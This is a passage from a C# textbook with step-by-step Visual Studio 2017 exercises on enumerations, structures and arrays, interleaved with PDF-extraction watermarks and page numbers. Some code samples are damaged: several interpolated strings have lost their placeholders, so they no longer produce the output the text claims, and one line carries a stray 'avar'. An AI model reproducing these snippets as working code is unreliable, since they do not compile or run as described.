Note When you type the period following Month, Microsoft
IntelliSense automatically displays all the values in the Month
enumeration.
7. On the Debug menu, click Start Without Debugging.
Download from finelybook [email protected]
337
Visual Studio 2017 builds and runs the program. Confirm that the word
January is written to the console.
8. Press Enter to close the program and return to the Visual Studio 2017
programming environment.
9. Add two more statements to the doWork method to increment the first
variable and display its new value to the console, as shown in bold here:
Click here to view code image
static void doWork()
{
Month first = Month.January;
Console.WriteLine(first);
first++;
Console.WriteLine(first);
}
10. On the Debug menu, click Start Without Debugging.
Visual Studio 2017 builds and runs the program. Confirm that the words
January and February are written to the console.
Notice that performing a mathematical operation (such as the increment
operation) on an enumeration variable changes the internal integer value
of the variable. When the variable is written to the console, the
corresponding enumeration value is displayed.
11. Press Enter to close the program and return to the Visual Studio 2017
programming environment.
12. Modify the first statement in the doWork method to initialize the first
variable to Month.December, as shown in bold here:
Click here to view code image
static void doWork()
{
Month first = Month.December;
Console.WriteLine(first);
first++;
Console.WriteLine(first);
}
13. On the Debug menu, click Start Without Debugging.
Download from finelybook [email protected]
338
Visual Studio 2017 builds and runs the program. This time, the word
December is written to the console, followed by the number 12.
Although you can perform arithmetic on an enumeration, if the results of
the operation are outside the range of values defined for the
enumeration, all the runtime can do is interpret the value of the variable
as the corresponding integer value.
14. Press Enter to close the program and return to the Visual Studio 2017
programming environment.
Working with structures
Chapter 8 illustrated that classes define reference types that are always
created on the heap. In some cases, the class can contain so little data that the
overhead of managing the heap becomes disproportionate. In these cases, it is
better to define the type as a structure. A structure is a value type. Because
structures are stored on the stack, as long as the structure is reasonably small,
the memory management overhead is often reduced.
Like a class, a structure can have its own fields, methods, and (with one
important exception discussed later in this chapter) constructors.
Common structure types
You might not have realized it, but you have already used structures in
previous exercises in this book. For example, tuples are actually
examples of the System.ValueTuple structure. Rather more interestingly,
in C#, the primitive numeric types int, long, and float are aliases for the
structures System.Int32, System.Int64, and System.Single, respectively.
These structures have fields and methods, and you can actually call
methods on variables and literals of these types. For example, all these
structures provide a ToString method that can convert a numeric value
to its string representation. The following statements are all legal in C#:
Click here to view code image
int i = 55;
Console.WriteLine(i.ToString());
Download from finelybook [email protected]
339
Console.WriteLine(55.ToString());
float f = 98.765F;
Console.WriteLine(f.ToString());
Console.WriteLine(98.765F.ToString());
Console.WriteLine((500, 600).ToString()); // (500, 600) is a
constant tuple
You don’t see this use of the ToString method often because the
Console.WriteLine method calls it automatically when it is needed. It is
more common to use some of the static methods exposed by these
structures. For example, in earlier chapters, you used the static int.Parse
method to convert a string to its corresponding integer value. What you
are actually doing is invoking the Parse method of the Int32 structure:
Click here to view code image
string s = "42";
int i = int.Parse(s); // exactly the same as Int32.Parse
These structures also include some useful static fields. For example,
Int32.MaxValue is the maximum value that an int can hold, and
Int32.MinValue is the minimum value that you can store in an int .
The following table shows the primitive types in C# and their
equivalent types in the Microsoft .NET Framework. Notice that the
string and object types are classes (reference types) rather than
structures.
Keyword
Type equivalent
Class or structure
bool
System.Boolean
Structure
byte
System.Byte
Structure
decimal
System.Decimal
Structure
double
System.Double
Structure
float
System.Single
Structure
int
System.Int32
Structure
long
System.Int64
Structure
Download from finelybook [email protected]
340
object
System.Object
Class
sbyte
System.SByte
Structure
short
System.Int16
Structure
string
System.String
Class
uint
System.UInt32
Structure
ulong
System.UInt64
Structure
ushort
System.UInt16
Structure
Declaring a structure
To declare your own structure type, you use the struct keyword followed by
the name of the type and then enclose the body of the structure between
opening and closing braces. Syntactically, the process is similar to declaring a
class. For example, here is a structure named Time that contains three public
int fields named hours, minutes, and seconds:
Click here to view code image
struct Time
{
public int hours, minutes, seconds;
}
As with classes, making the fields of a structure public is not advisable in
most cases; there is no way to control the values held in public fields. For
example, anyone could set the value of minutes or seconds to a value greater
than 60. A better idea is to make the fields private and provide your structure
with constructors and methods to initialize and manipulate these fields, as
shown in this example:
Click here to view code image
struct Time
{
private int hours, minutes, seconds;
...
public Time(int hh, int mm, int ss)
{
Download from finelybook [email protected]
341
this.hours = hh % 24;
this.minutes = mm % 60;
this.seconds = ss % 60;
}
public int Hours()
{
return this.hours;
}
}
Note By default, you cannot use many of the common operators on
your own structure types. For example, you cannot use operators such
as the equality operator (==) and the inequality operator (!=) on your
own structure type variables. However, you can use the built-in
Equals() method exposed by all structures to compare structure type
variables, and you can also explicitly declare and implement operators
for your own structure types. The syntax for doing this is covered in
Chapter 21, “Querying in-memory data by using query expressions.”
When you copy a value type variable, you get two copies of the value. In
contrast, when you copy a reference type variable, you get two references to
the same object. In summary, use structures for small data values for which
it’s just as or nearly as efficient to copy the value as it would be to copy an
address. Use classes for more complex data that is too big to copy efficiently.
Tip Use structures to implement simple concepts whose main feature is
their value rather than the functionality that they provide.
Understanding differences between structures and
Download from finelybook [email protected]
342
classes
A structure and a class are syntactically similar, but they have a few
important differences. Let’s look at some of these variances:
You can’t declare a default constructor (a constructor with no
parameters) for a structure. The following example would compile if
Time were a class, but because Time is a structure it does not:
Click here to view code image
struct Time
{
public Time() { ... } // compile-time error
...
}
The reason you can’t declare your own default constructor for a
structure is that the compiler always generates one. In a class, the
compiler generates the default constructor only if you don’t write a
constructor yourself. The compiler-generated default constructor for a
structure always sets the fields to 0, false, or null—just as for a class.
Therefore, you should ensure that a structure value created by the
default constructor behaves logically and makes sense with these default
values. This has some ramifications that you will explore in the next
exercise.
You can initialize fields to different values by providing a nondefault
constructor. However, when you do this, your nondefault constructor
must explicitly initialize all fields in your structure; the default
initialization no longer occurs. If you fail to do this, you’ll get a
compile-time error. For example, although the following example would
compile and silently initialize seconds to 0 if Time were a class, it fails
to compile because Time is a structure:
Click here to view code image
struct Time
{
private int hours, minutes, seconds;
...
public Time(int hh, int mm)
{
this.hours = hh;
this.minutes = mm;
Download from finelybook [email protected]
343
} // compile-time error: seconds not initialized
}
In a class, you can initialize instance fields at their point of declaration.
In a structure, you cannot. The following example would compile if
Time were a class, but it causes a compile-time error because Time is a
structure:
Click here to view code image
struct Time
{
private int hours = 0; // compile-time error
private int minutes; private int seconds;
...
}
The following table summarizes the main differences between a structure
and a class.
Question
Structure
Class
Is this a value type or a reference
type?
A structure is a
value type.
A class is a
reference type.
Do instances live on the stack or
the heap?
Structure
instances are
called values and
live on the stack.
Class instances
are called objects
and live on the
heap.
Can you declare a default
constructor?
No
Yes
If you declare your own
constructor, will the compiler still
generate the default constructor?
Yes
No
If you don’t initialize a field in
your own constructor, will the
compiler automatically initialize it
for you?
No
Yes
Are you allowed to initialize
instance fields at their point of
declaration?
No
Yes
Download from finelybook [email protected]
344
There are other differences between classes and structures concerning
inheritance. These differences are covered in Chapter 12, “Working with
inheritance.”
Declaring structure variables
After you have defined a structure type, you can use it in the same way as
you do any other type. For example, if you have defined the Time structure,
you can create variables, fields, and parameters of type Time, as shown in this
example:
Click here to view code image
struct Time
{
private int hours, minutes, seconds;
...
}
class Example
{
private Time currentTime;
public void Method(Time parameter)
{
Time localVariable;
...
}
}
Note As with enumerations, you can create a nullable version of a
structure variable by using the ? modifier. You can then assign the null
value to the variable:
Time? currentTime = null;
Understanding structure initialization
Earlier in this chapter, you saw how you could initialize the fields in a
structure by using a constructor. If you call a constructor, the various rules
Download from finelybook [email protected]
345
described earlier guarantee that all the fields in the structure will be
initialized:
Time now = new Time();
The following illustration depicts the state of the fields in this structure:
However, because structures are value types, you can also create structure
variables without calling a constructor, as shown in the following example:
Time now;
This time, the variable is created, but its fields are left in their uninitialized
state. The following illustration depicts the state of the fields in the now
variable. Any attempt to access the values in these fields will result in a
compiler error:
Note that in both cases, the now variable is created on the stack.
If you’ve written your own structure constructor, you can also use that to
initialize a structure variable. As explained earlier in this chapter, a structure
constructor must always explicitly initialize all its fields. For example:
Click here to view code image
struct Time
{
private int hours, minutes, seconds;
...
Download from finelybook [email protected]
346
public Time(int hh, int mm)
{
hours = hh;
minutes = mm;
seconds = 0;
}
}
The following example initializes now by calling a user-defined
constructor:
Time now = new Time(12, 30);
The following illustration shows the effect of this example:
It’s time to put this knowledge into practice. In the following exercise,
you will create and use a structure to represent a date.
Create and use a structure type
1. In the StructsAndEnums project, display the Date.cs file in the Code and
Text Editor window.
2. Replace the TODO comment with a structure named Date inside the
StructsAndEnums namespace.
This structure should contain three private fields: one named year of
type int, one named month of type Month (using the enumeration you
created in the preceding exercise), and one named day of type int. The
Date structure should look exactly as follows:
Click here to view code image
struct Date
{
private int year;
private Month month;
private int day;
}
Download from finelybook [email protected]
347
Consider the default constructor that the compiler will generate for Date.
This constructor sets the year to 0, the month to 0 (the value of January),
and the day to 0. The year value 0 is not valid (because there was no
year 0), and the day value 0 is also not valid (because each month starts
on day 1). One way to fix this problem is to translate the year and day
values by implementing the Date structure so that when the year field
holds the value Y, this value represents the year Y + 1900 (or you can
pick a different century if you prefer), and when the day field holds the
value D, this value represents the day D + 1. The default constructor will
then set the three fields to values that represent the date 1 January 1900.
If you could override the default constructor and write your own, this
would not be an issue because you could then initialize the year and day
fields directly to valid values. You cannot do this, though, so you have
to implement the logic in your structure to translate the compiler-
generated default values into meaningful values for your problem
domain.
However, although you cannot override the default constructor, it is still
good practice to define nondefault constructors to allow a user to
explicitly initialize the fields in a structure to meaningful nondefault
values.
3. Add a public constructor to the Date structure. This constructor should
take three parameters: an int named ccyy for the year, a Month named
mm for the month, and an int named dd for the day. Use these three
parameters to initialize the corresponding fields. A year field with the
value Y represents the year Y + 1900, so you need to initialize the year
field to the value ccyy – 1900. A day field with the value D represents
the day D + 1, so you need to initialize the day field to the value dd – 1.
The Date structure should now look like this (with the constructor
shown in bold):
Click here to view code image
struct Date
{
private int year;
private Month month;
private int day;
public Date(int ccyy, Month mm, int dd)
Download from finelybook [email protected]
348
{
this.year = ccyy - 1900;
this.month = mm;
this.day = dd - 1;
}
}
4. Add a public method named ToString to the Date structure after the
constructor. This method takes no arguments and returns a string
representation of the date. Remember, the value of the year field
represents year + 1900, and the value of the day field represents day + 1.
Note The ToString method is a little different from the methods
you have seen so far. Every type, including structures and classes
that you define, automatically has a ToString method whether or
not you want it. Its default behavior is to convert the data in a
variable to a string representation of that data. Sometimes the
default behavior is meaningful; other times it is less so. For
example, the default behavior of the ToString method generated for
the Date structure simply generates the string
“StructsAndEnums.Date”. To quote Zaphod Beeblebrox in The
Restaurant at the End of the Universe by Douglas Adams (Pan
Macmillan, 1980), this is “shrewd, but dull.” You need to define a
new version of this method that overrides the default behavior by
using the override keyword. Overriding methods are discussed in
more detail in Chapter 12.
The ToString method should look like this:
Click here to view code image
struct Date
{
...
public override string ToString()
{
string data = $"{this.month} {this.day + 1} {this.year +
1900}";
Download from finelybook [email protected]
349
return data;
}
}
In this method, you build a formatted string using the text
representations of the values of the month field, the expression this.day
+ 1, and the expression this.year + 1900. The ToString method returns
the formatted string as its result.
5. Display the Program.cs file in the Code and Text Editor window.
6. In the doWork method, comment out the four existing statements.
7. Add statements to the doWork method that declare a local variable
named defaultDate and initialize it to a Date value constructed by using
the default Date constructor. Add another statement to doWork to
display the defaultDate variable on the console by calling
Console.WriteLine.
Note The Console.WriteLine method automatically calls the
ToString method of its argument to format the argument as a
string.
The doWork method should now look like this:
static void doWork()
{
...
Date defaultDate = new Date();
Console.WriteLine(defaultDate);
}
Note When you type new Date(, IntelliSense automatically detects
that two constructors are available for the Date type.
Download from finelybook [email protected]
350
8. On the Debug menu, click Start Without Debugging to build and run the
program. Verify that the date January 1 1900 is written to the console.
9. Press the Enter key to return to the Visual Studio 2017 programming
environment.
10. In the Code and Text Editor window, return to the doWork method and
add two more statements. In the first statement, declare a local variable
named weddingAnniversary and initialize it to July 4 2017. (I actually
did get married on American Independence Day, although it was many
years ago.) In the second statement, write the value of
weddingAnniversary to the console.
The doWork method should now look like this:
Click here to view code image
static void doWork()
{
...
Date weddingAnniversary = new Date(2017, Month.July, 4);
Console.WriteLine(weddingAnniversary);
}
11. On the Debug menu, click Start Without Debugging, and then confirm
that the date July 4 2017 is written to the console below the previous
information.
12. Press Enter to close the program and return to Visual Studio 2017.
Copying structure variables
You’re allowed to initialize or assign one structure variable to another
structure variable, but only if the structure variable on the right side is
completely initialized (that is, if all its fields are populated with valid data
rather than undefined values). The following example compiles because now
is fully initialized. The illustration shows the results of performing such an
assignment.
Click here to view code image
Date now = new Date(2012, Month.March, 19);
Date copy = now;
Download from finelybook [email protected]
351
The following example fails to compile because now is not initialized:
Click here to view code image
Date now;
Date copy = now; // compile-time error: now has not been assigned
When you copy a structure variable, each field on the left side is intialized
directly using the corresponding field on the right side. This copying is done
as a fast, single operation that copies the contents of the entire structure, and
it never throws an exception. Compare this behavior with the equivalent
action if Time were a class, in which case both variables (now and copy)
would end up referencing the same object on the heap.
Note If you are a C++ programmer, you should note that this copy
behavior cannot be customized.
In the final exercise in this chapter, you will contrast the copy behavior of
a structure with that of a class.
Compare the behavior of a structure and a class
1. In the StructsAndEnums project, display the Date.cs file in the Code and
Text Editor window.
Download from finelybook [email protected]
352
2. Add the following method to the Date structure. This method moves the
date in the structure forward by one month. If, after advancing the
month, the value of the month field has moved beyond December, the
code resets the month to January and advances the value of the year
field by 1.
Click here to view code image
struct Date
{
...
public void AdvanceMonth()
{
this.month++;
if (this.month == Month.December + 1)
{
this.month = Month.January;
this.year++;
}
}
}
3. Display the Program.cs file in the Code and Text Editor window.
4. In the doWork method, comment out the first two uncommented
statements that create and display the value of the defaultDate variable.
5. Add the following code shown in bold to the end of the doWork method.
This code creates a copy of the weddingAnniversary variable called
weddingAnniversaryCopy and prints out the value of this new variable.
Click here to view code image
static void doWork()
{
...
Date weddingAnniversaryCopy = weddingAnniversary;
Console.WriteLine($"Value of copy is ");
}
6. Add the following statements shown in bold to the end of the doWork
method. These statements call the AdvanceMonth method of the
weddingAnniversary variable and then display the value of the
weddingAnniversary and weddingAnniversaryCopy variables:
Click here to view code image
static void doWork()
Download from finelybook [email protected]
353
{
...
weddingAnniversary.AdvanceMonth();
Console.WriteLine($"New value of weddingAnniversary is ");
Console.WriteLine($"Value of copy is still ");
}
7. On the Debug menu, click Start Without Debugging to build and run the
application. Verify that the console window displays the following
messages:
Click here to view code image
July 4 2017
Value of copy is July 4 2017
New value of weddingAnniversary is August 4 2017
Value of copy is still July 4 2017
The first message displays the initial value of the weddingAnniversary
variable (July 4 2017). The second message displays the value of the
weddingAnniversaryCopy variable. You can see that it contains the same
date held in the weddingAnniversary variable (July 4 2017). The third
message displays the value of the weddingAnniversary variable after
changing the month to August (August 4 2017). The final statement
displays the value of the weddingAnniversaryCopy variable. Notice that
it has not changed from its original value of July 4 2017.
If Date were a class, creating a copy would reference the same object in
memory as the original instance. Changing the month in the original
instance would therefore also change the date referenced through the
copy. You will verify this assertion in the following steps.
8. Press Enter and return to Visual Studio 2017.
9. Display the Date.cs file in the Code and Text Editor window.
10. Change the Date structure to a class, as shown in bold in the following
code example:
Click here to view code image
class Date
{
...
}
Download from finelybook [email protected]
354
11. On the Debug menu, click Start Without Debugging to build and run the
application again. Verify that the console window displays the following
messages:
Click here to view code image
July 4 2017
Value of copy is July 4 2017
New value of weddingAnniversary is August 4 2017
Value of copy is still August 4 2017
The first three messages are the same as before. However, the fourth
message shows that the value of the weddingAnniversaryCopy variable
has changed to August 4 2017.
12. Press Enter and return to Visual Studio 2017.
Structures and compatibility with the Windows
Runtime
All C# applications execute by using the common language runtime
(CLR) of the .NET Framework. The CLR is responsible for providing a
safe and secure environment for your application code in the form of a
virtual machine (if you have come from a Java background, this concept
should be familiar to you). When you compile a C# application, the
compiler converts your C# code into a set of instructions using a
pseudo-machine code called the Common Intermediate Language
(CIL). These are the instructions that are stored in an assembly. When
you run a C# application, the CLR takes responsibility for converting
the CIL instructions into real machine instructions that the processor on
your computer can understand and execute. This whole environment is
known as the managed execution environment, and C# programs are
frequently referred to as managed code. You can also write managed
code in other languages supported by the .NET Framework, such as
Visual Basic and F#.
On Windows 7 and earlier versions, you can additionally write
unmanaged applications, also known as native code, based on the
Win32 APIs, which are the APIs that interface directly with the
Windows operating system. (The CLR also converts many of the
Download from finelybook [email protected]
355
functions in the .NET Framework into Win32 API calls if you are
running a managed application, although this process is totally
transparent to your code.) To do this, you can use a language such as
C++. The .NET Framework makes it possible for you to integrate
managed code into unmanaged applications, and vice versa, through a
set of interoperability technologies. Detailing how these technologies
work and how you use them is beyond the scope of this book—suffice
to say that it was not always straightforward.
Later versions of Windows provide an alternative strategy in the
form of the Windows Runtime, or WinRT. WinRT introduces a layer on
top of the Win32 API (and other selected native Windows APIs) that
provides consistent functionality across different types of hardware,
from servers to phones. When you build a Universal Windows Platform
(UWP) app, you use the APIs exposed by WinRT rather than Win32.
Similarly, the CLR on Windows 10 also uses WinRT; all managed code
written by using C# or any other managed language is still executed by
the CLR, but at runtime the CLR converts your code into WinRT API
calls rather than Win32. Between them, the CLR and WinRT are
responsible for managing and running your code safely.
A primary purpose of WinRT is to simplify the interoperability
between languages so that you can more easily integrate components
developed by using different programming languages into a single
seamless application. However, this simplicity comes at a cost, and you
have to be prepared to make a few compromises based on the different
feature sets of the various languages available. In particular, for
historical reasons, although C++ supports structures, it does not
recognize member functions. In C# terms, a member function is an
instance method. So, if you are building C# structures (or structs) that
you want to package up in a library to make available to developers
programming in C++ (or any other unmanaged language), these structs
should not contain any instance methods. The same restriction applies
to static methods in structs. If you want to include instance or static
methods, you should convert your struct into a class. Additionally,
structs cannot contain private fields, and all public fields must be C#
primitive types, conforming value types, or strings.
WinRT also imposes some other restrictions on C# classes and
Download from finelybook [email protected]
356
structs if you want to make them available to native applications.
Chapter 12 provides more information.
Summary
In this chapter, you saw how to create and use enumerations and structures.
You learned some of the similarities and differences between a structure and
a class, and you saw how to define constructors to initialize the fields in a
structure. You also saw how to represent a structure as a string by overriding
the ToString method.
If you want to continue to the next chapter, keep Visual Studio 2017
running and turn to Chapter 10, “Using arrays.”
If you want to exit Visual Studio 2017 now, on the File menu, click
Exit. If you see a Save dialog box, click Yes and save the project.
Quick reference
To
Do this
Declare an
enumeration
Write the keyword enum, followed by the name of the type,
followed by a pair of braces containing a comma-separated
list of the enumeration literal names. For example:
Click here to view code image
enum Season { Spring, Summer, Fall, Winter }
Declare an
enumeration
variable
Write the name of the enumeration on the left followed by
the name of the variable, followed by a semicolon. For
example:
Season currentSeason;
Assign an
enumeration
variable to a
value
Write the name of the enumeration literal in combination
with the name of the enumeration to which it belongs. For
example:
Download from finelybook [email protected]
357
Click here to view code image
currentSeason = Spring; // error
currentSeason = Season.Spring; // correct
Declare a
structure type
Write the keyword struct, followed by the name of the
structure type, followed by the body of the structure (the
constructors, methods, and fields). For example:
Click here to view code image
struct Time
{
public Time(int hh, int mm, int ss)
{ ... }
...
private int hours, minutes, seconds;
}
Declare a
structure
variable
Write the name of the structure type, followed by the name
of the variable, followed by a semicolon. For example:
Time now;
Initialize a
structure
variable to a
value
Initialize the variable to a structure value created by calling
the structure constructor. For example:
Time lunch = new Time(12, 30, 0);
Download from finelybook [email protected]
358
CHAPTER 10
Using arrays
After completing this chapter, you will be able to:
Declare array variables.
Populate an array with a set of data items.
Access the data items held in an array.
Iterate through the data items in an array.
You have already seen how to create and use variables of many different
types. However, all the examples of variables you have seen so far have one
thing in common—they hold information about a single item (an int, a float, a
Circle, a Date, and so on). What happens if you need to manipulate a set of
items? One solution is to create a variable for each item in the set, but this
leads to some further questions: How many variables do you need? How
should you name them? If you need to perform the same operation on each
item in the set (such as increment each variable in a set of integers), how
would you avoid very repetitive code? Using a variable for separate items
assumes that you know when you write the program, how many items you
will need. But how often is this the case? For example, if you are writing an
application that reads and processes records from a database, how many
records are in the database, and how likely is this number to change?
Arrays provide a mechanism that helps to solve these problems.
Declaring and creating an array
Download from finelybook [email protected]
359
An array is an unordered sequence of items. All the items in an array have
the same type, unlike the fields in a structure or class, which can have
different types. The items in an array live in a contiguous block of memory
and are accessed by using an index, unlike fields in a structure or class, which
are accessed by name.
Declaring array variables
You declare an array variable by specifying the name of the element type,
followed by a pair of square brackets, followed by the variable name. The
square brackets signify that the variable is an array. For example, to declare
an array of int variables named pins (for holding a set of personal
identification numbers), you can write the following:
Click here to view code image
int[] pins; // Personal Identification Numbers
Note If you are a Microsoft Visual Basic programmer, you should
observe that square brackets, not parentheses, are used in the
declaration. If you’re familiar with C and C++, also note that the size of
the array is not part of the declaration. Additionally, the square brackets
must be placed before the variable name.
You are not restricted to using primitive types as array elements. You can
also create arrays of structures, enumerations, and classes. For example, you
can create an array of Date structures like this:
Date[] dates;
Tip It is often useful to give array variables plural names, such as
Download from finelybook [email protected]
360
places (where each element is a Place), people (where each element is a
Person), or times (where each element is a Time).
Creating an array instance
Arrays are reference types, regardless of the type of their elements. This
means that an array variable refers to a contiguous block of memory holding
the array elements on the heap, just as a class variable refers to an object on
the heap. (For a description of values and references and the differences
between the stack and the heap, see Chapter 8, “Understanding values and
references.”) This rule applies regardless of the type of the data items in the
array. Even if the array contains a value type such as int, the memory will
still be allocated on the heap; this is the one case where value types are not
allocated memory on the stack.
Remember that when you declare a class variable, memory is not
allocated for the object until you create the instance by using new. Arrays
follow the same pattern: when you declare an array variable, you do not
declare its size and no memory is allocated (other than to hold the reference
on the stack). The array is given memory only when the instance is created,
and this is also the point at which you specify the size of the array.
To create an array instance, you use the new keyword followed by the
element type, followed by the size of the array you’re creating enclosed
between square brackets. Creating an array also initializes its elements by
using the now familiar default values (0, null, or false, depending on whether
the type is numeric, a reference, or a Boolean, respectively). For example, to
create and initialize a new array of four integers for the pins variable declared
earlier, you write this:
pins = new int[4];
The following illustration shows what happens when you declare an array,
and later when you create an instance of the array:
Download from finelybook [email protected]
361
Because the memory for the array instance is allocated dynamically, the
size of the array does not have to be a constant; it can be calculated at
runtime, as shown in this example:
Click here to view code image
int size = int.Parse(Console.ReadLine());
int[] pins = new int[size];
You can also create an array whose size is 0. This might sound bizarre,
but it’s useful for situations in which the size of the array is determined
dynamically and could even be 0. An array of size 0 is not a null array; it is
an array containing zero elements.
Populating and using an array
When you create an array instance, all the elements of the array are initialized
to a default value depending on their type. For example, all numeric values
default to 0, objects are initialized to null, DateTime values are set to the date
and time “01/01/0001 00:00:00”, and strings are initialized to null. You can
modify this behavior and initialize the elements of an array to specific values
if you prefer. You do this by providing a comma-separated list of values
between a pair of braces. For example, to initialize pins to an array of four int
variables whose values are 9, 3, 7, and 2, you write this:
Click here to view code image
int[] pins = new int[4]{ 9, 3, 7, 2 };
The values between the braces do not have to be constants; they can be
values calculated at runtime, as shown in the following example, which
populates the pins array with four random numbers:
Click here to view code image
Download from finelybook [email protected]
362
Random r = new Random();
int[] pins = new int[4]{ r.Next() % 10, r.Next() % 10, r.Next() % 10,
r.Next() % 10 };
Note The System.Random class is a pseudorandom number generator.
The Next method returns a nonnegative random integer in the range 0 to
Int32.MaxValue by default. The Next method is overloaded, and other
versions enable you to specify the minimum value and maximum value
of the range. The default constructor for the Random class seeds the
random number generator with a time-dependent seed value, which
reduces the possibility of the class duplicating a sequence of random
numbers. Using an overloaded version of the constructor, you can
provide your own seed value. That way, you can generate a repeatable
sequence of random numbers for testing purposes.
The number of values between the braces must exactly match the size of
the array instance being created:
Click here to view code image
int[] pins = new int[3]{ 9, 3, 7, 2 }; // compile-time error
int[] pins = new int[4]{ 9, 3, 7 }; // compile-time error
int[] pins = new int[4]{ 9, 3, 7, 2 }; // OK
When you’re initializing an array variable in this way, you can actually
omit the new expression and the size of the array. In this case, the compiler
calculates the size from the number of initializers and generates code to
create the array, such as in the following example:
int[] pins = { 9, 3, 7, 2 };
If you create an array of structures or objects, you can initialize each
structure in the array by calling the structure or class constructor, as shown in
this example:
Click here to view code image
Time[] schedule = { new Time(12,30), new Time(5,30) };
Download from finelybook [email protected]
363
Creating an implicitly typed array
The element type when you declare an array must match the type of elements
that you attempt to store in the array. For example, if you declare pins to be
an array of int, as shown in the preceding examples, you cannot store a
double, string, struct, or anything that is not an int in this array. If you specify
a list of initializers when declaring an array, you can let the C# compiler infer
the actual type of the elements in the array for you, like this:
Click here to view code image
var names = new[]{"John", "Diana", "James", "Francesca"};
In this example, the C# compiler determines that the names variable is an
array of strings. It is worth pointing out a couple of syntactic quirks in this
declaration. First, you omit the square brackets from the type; the names
variable in this example is declared simply as var, not var[]. Second, you
must specify the new operator and square brackets before the initializer list.
If you use this syntax, you must ensure that all the initializers have the
same type. This next example causes the compile-time error “No best type
found for implicitly-typed array”:
Click here to view code image
var bad = new[]{"John", "Diana", 99, 100};
However, in some cases, the compiler will convert elements to a different
type, if doing so makes sense. In the following code, the numbers array is an
array of double because the constants 3.5 and 99.999 are both double, and the
C# compiler can convert the integer values 1 and 2 to double values:
Click here to view code image
var numbers = new[]{1, 2, 3.5, 99.999};
Generally, it is best to avoid mixing types, hoping that the compiler will
convert them for you.
Implicitly typed arrays are most useful when you are working with
anonymous types, as described in Chapter 7, “Creating and managing classes
and objects.” The following code creates an array of anonymous objects, each
containing two fields specifying the name and age of the members of my
family:
Download from finelybook [email protected]
364
Click here to view code image
var names = new[] { new { Name = "John", Age = 53 },
new { Name = "Diana", Age = 53 },
new { Name = "James", Age = 26 },
new { Name = "Francesca", Age = 23 } };
The fields in the anonymous types must be the same for each element of
the array.
Accessing an individual array element
To access an individual array element, you must provide an index indicating
which element you require. Array indexes are zero-based; thus, the initial
element of an array lives at index 0 and not index 1. An index value of 1
accesses the second element. For example, you can read the contents of
element 2 (the third element) of the pins array into an int variable by using
the following code:
int myPin;
myPin = pins[2];
Similarly, you can change the contents of an array by assigning a value to
an indexed element:
myPin = 1645;
pins[2] = myPin;
All array element access is bounds-checked. If you specify an index that is
less than 0 or greater than or equal to the length of the array, the compiler
throws an IndexOutOfRangeException exception, as in this example:
Click here to view code image
try
{
int[] pins = { 9, 3, 7, 2 };
Console.WriteLine(pins[4]); // error, the 4th and last element is
at index 3
}
catch (IndexOutOfRangeException ex)
{
...
}
Download from finelybook [email protected]
365
Iterating through an array
All arrays are actually instances of the System.Array class in the Microsoft
.NET Framework, and this class defines some useful properties and methods.
For example, you can query the Length property to discover how many
elements an array contains and iterate through all the elements of an array by
using a for statement. The following sample code writes the array element
values of the pins array to the console:
Click here to view code image
int[] pins = { 9, 3, 7, 2 };
for (int index = 0; index < pins.Length; index++)
{
int pin = pins[index];
Console.WriteLine(pin);
}
Note Length is a property and not a method, which is why you don’t use
parentheses when you call it. You will learn about properties in Chapter
15, “Implementing properties to access fields.”
It is common for new programmers to forget that arrays start at element 0
and that the last element is numbered Length – 1. C# provides the foreach
statement, with which you can iterate through the elements of an array
without worrying about these issues. For example, here’s the preceding for
statement rewritten as an equivalent foreach statement:
Click here to view code image
int[] pins = { 9, 3, 7, 2 };
foreach (int pin in pins)
{
Console.WriteLine(pin);
}
The foreach statement declares an iteration variable (in this example, int
pin) that automatically acquires the value of each element in the array. The
type of this variable must match the type of the elements in the array. The
Download from finelybook [email protected]
366
foreach statement is the preferred way to iterate through an array; it expresses
the intention of the code directly, and all of the for loop scaffolding drops
away. However, in a few cases, you’ll find that you have to revert to a for
statement:
A foreach statement always iterates through the entire array. If you
want to iterate through only a known portion of an array (for example,
the first half) or bypass certain elements (for example, every third
element), it’s easier to use a for statement.
A foreach statement always iterates from index 0 through index Length
– 1. If you want to iterate backward or in some other sequence, it’s
easier to use a for statement.
If the body of the loop needs to know the index of the element rather
than just the value of the element, you have to use a for statement.
If you need to modify the elements of the array, you have to use a for
statement. This is because the iteration variable of the foreach
statement is a read-only copy of each element of the array.
Tip It’s perfectly safe to attempt to iterate through a zero-length array
by using a foreach statement.
You can declare the iteration variable as a var and let the C# compiler
work out the type of the variable from the type of the elements in the array.
This is especially useful if you don’t actually know the type of the elements
in the array, such as when the array contains anonymous objects. The
following example demonstrates how you can iterate through the array of
family members shown earlier:
Click here to view code image
avar names = new[] { new { Name = "John", Age = 50 },
new { Name = "Diana", Age = 50 },
new { Name = "James", Age = 23 },
new { Name = "Francesca", Age = 21 } };
Click here to view code image
Download from finelybook [email protected]
367
foreach (var familyMember in names)
{
Console.WriteLine($"Name: {familyMember.Name}, Age:
{familyMember.Age}");
}
Passing arrays as parameters and return values for a
method
You can define methods that take arrays as parameters or pass them back as
return values.
The syntax for passing an array as a parameter is much the same as for
declaring an array. For example, the code sample that follows defines a
method named ProcessData that takes an array of integers as a parameter.
The body of the method iterates through the array and performs some
unspecified processing on each element:
Click here to view code image
public void ProcessData(int[] data)
{
foreach (int i in data)
{
...
}
}
It is important to remember that arrays are reference objects, so if you
modify the contents of an array passed as a parameter inside a method such
as ProcessData, the modification is visible through all references to the array,
including the original argument passed as the parameter.
To return an array from a method, you specify the type of the array as the
return type. In the method, you create and populate the array. The following
example prompts the user for the size of an array, followed by the data for
each element. The array created by the method is passed back as the return
value:
Click here to view code image
public int[] ReadData()
{
Console.WriteLine("How many elements?");
string reply = Console.ReadLine();
Download from finelybook [email protected]
368
int numElements = int.Parse(reply);
int[] data = new int[numElements];
for (int i = 0; i < numElements; i++)
{
Console.WriteLine($"Enter data for element ");
reply = Console.ReadLine();
int elementData = int.Parse(reply);
data[i] = elementData;
}
return data;
}
You can call the ReadData method like this:
int[] data = ReadData();
Array parameters and the Main method
You might have noticed that the Main method for an application takes
an array of strings as a parameter:
Click here to view code image
static void Main(string[] args)
{
...
}
Remember that the Main method is called when your program starts
running; it is the entry point of your application. If you start the
application from the command line, you can specify additional
command-line arguments. The Windows operating system passes these
arguments to the common language runtime (CLR), which in turn
passes them as arguments to the Main method. This mechanism gives
you a simple way to allow a user to provide information when an
application starts running instead of prompting the user interactively.
This approach is useful if you want to build utilities that can be run
from automated scripts.
The following example is taken from a utility application called
MyFileUtil that processes files. It expects a set of file names on the
command line and calls the ProcessFile method (not shown) to handle
each file specified:
Download from finelybook [email protected]
369
Click here to view code image
static void Main(string[] args)
{
foreach (string filename in args)
